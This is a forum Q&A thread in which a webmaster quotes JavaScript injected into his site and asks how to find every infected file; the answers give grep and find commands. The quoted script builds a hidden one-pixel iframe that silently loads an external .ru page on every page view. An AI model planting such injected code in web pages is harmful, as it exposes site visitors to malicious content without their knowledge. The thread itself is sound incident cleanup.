# find "an expression" on each file of a directory recursively

Tags: find, recursive

One of my website on my webserver has suffered an attack : code injection.

Here is the malicious code :

```
<script type=\"text/javascript\" language=\"javascript\">
(function () {     
    var t = document.createElement('iframe');    
    t.src = 'http://ahtiagge.ru/count27.php';    
    t.style.position = 'absolute';    
    t.style.border = '0';    
    t.style.height = '1px';    
    t.style.width = '1px';    
    t.style.left = '1px';    
    t.style.top = '1px';    
    if (!document.getElementById('t')) {        
        document.write('<div id=\'t\'></div>');
        document.getElementById('t').appendChild(t);    
    }
 })
();</script>
```

I want to know the name (and path) of all files coutains the expression on my server to stanch the contagion. Here is the expression i want to match :'http://ahtiagge.ru/count27.php'

I would like results like that :

```
/var/www/vhosts/site1.com/httpdocs/index.php
/var/www/vhosts/site1.com/httpdocs/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/and_sub/fileN.php
```

How can I solve this with a shell script ? is it possible ?

Comment: would a simple `grep -rl 'http://ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/*` work for you?

Comment: can I redirect the output in a file like grep -rl 'http://ahtiagge.ru/count27.php' /var/www/vhosts/site1.com/httpdocs/* > scran.txt ?

Comment: yeah of course.

Comment: careful, Raphaël, you added a ";" after "php'" which shouldn't be here : it would separate the command into 2 commands, the 2nd one launching "/var/www/...../site1.com" with arguments "/httpdocs/*" ... just drop the ";".

Comment: ha good catch didn't see that

Answer (score 2, accepted):

You can simply use `grep` for the same

```
grep -RP "http:\/\/ahtiagge.ru\/count27\.php" /var/www/vhosts/
```

or only check in *.php files only with the help of `find`

```
find /var/www/vhosts/ -name "*.php" -print | xargs grep -P "http:\/\/ahtiagge.ru\/count27\.php"
```

Answer (score 1):

I like this command:

```
grep -i -n -I -H -R --include="*.php" -E "some_expression" .
```

Cheers.